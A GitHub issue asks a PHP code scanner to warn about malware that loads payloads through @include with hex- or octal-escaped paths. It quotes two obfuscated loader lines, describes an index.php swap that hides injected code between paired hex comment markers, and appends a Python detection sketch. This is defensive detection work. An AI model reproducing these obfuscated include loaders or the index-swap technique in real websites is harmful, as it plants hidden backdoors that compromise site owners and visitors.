@include should generate a warning
lcssanches opened this issue · 0 comments
lcssanches commented
Most of this malware uses @include and an escaped path. (I don't know how to use @(together) without mentioning)
/*8a68d*/
@include "\x2fh\x6fm\x65/\x77e\x62p\x6ce\x78x\x33/\x70u\x62l\x69c\x5fh\x74m\x6c/\x68i\x73-\x68e\x6d.\x6fr\x67/\x5f_\x4dA\x43O\x53X\x2fm\x6fd\x75l\x65s\x2fn\x6fd\x65/\x66a\x76i\x63o\x6e_\x31a\x33f\x384\x2ei\x63o";
/*8a68d*/
OR
@include "\057hom\145/we\164wne\164/pu\142lic\137htm\154/wp\055con\164ent\057upl\157ads\057201\066/.e\1420f5\06081.\151co";
It would be useful to search for and generate a warning for things like this.
Also sometimes what they do is:
+--- Folder
| --- index.html ( or index.php )
What they do is rename the legitimate index to index.html.bak.bak and create an evil version, index.php
+--- Folder
| --- index.html.bak.bak
| --- index.php
//index.php
<?php
/*sixhex*/
// evil here ( ò.ó )
/*sixhex*/
@include('index.html.bak.bak');
Also, another thing is this comment with hexadecimal code. They are all six characters and always have two occurrences in the code.
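
A sketch of the checks requested in this issue, added here as an example; it is not part of the original post and not the project's own code. The rule names, the `.php`/`.inc` allow-list and the sample input are assumptions made for illustration.

```python
import re
from collections import Counter

# Error-suppressed include/require with a quoted string literal argument.
INCLUDE_RE = re.compile(
    r"""@\s*(?:include|require)(?:_once)?\s*\(?\s*(["'])(?P<path>(?:\\.|(?!\1).)*)\1""",
    re.IGNORECASE)
# PHP double-quoted escapes: \xHH (1-2 hex digits) and \OOO (1-3 octal digits).
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")
# Hex-only comment marker; the post says six characters, its sample shows five.
MARKER_RE = re.compile(r"/\*([0-9a-f]{5,6})\*/")

# Constructed sample, not taken from a real infection.
SAMPLE = r'''<?php
/*a1b2c3*/
@include "\x2fv\x61r/\x77w\x77/\x66a\x76i\x63o\x6e.\x69c\x6f";
/*a1b2c3*/
@include('index.html.bak.bak');
include "header.php";
'''

def decode_php_escapes(literal):
    """Resolve \\xHH and octal escapes as PHP does inside double quotes."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal above \377
    return ESCAPE_RE.sub(repl, literal)

def scan(source):
    """Return (rule, detail) warnings for one PHP source string."""
    warnings = []
    for m in INCLUDE_RE.finditer(source):
        raw = m.group("path")
        if m.group(1) == '"' and ESCAPE_RE.search(raw):
            # Report the decoded target so an analyst can read it.
            warnings.append(("escaped-include", decode_php_escapes(raw)))
        elif not raw.lower().endswith((".php", ".inc")):
            # Assumption of this example: legitimate includes target .php/.inc.
            warnings.append(("non-php-include", raw))
    counts = Counter(MARKER_RE.findall(source))
    for marker, n in sorted(counts.items()):
        if n == 2:  # opening and closing marker around the injected block
            warnings.append(("paired-hex-marker", marker))
    return warnings

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE):
        print(f"WARNING {rule}: {detail}")
```

Escapes are only decoded for double-quoted literals, since PHP does not interpret `\x` or octal sequences inside single quotes.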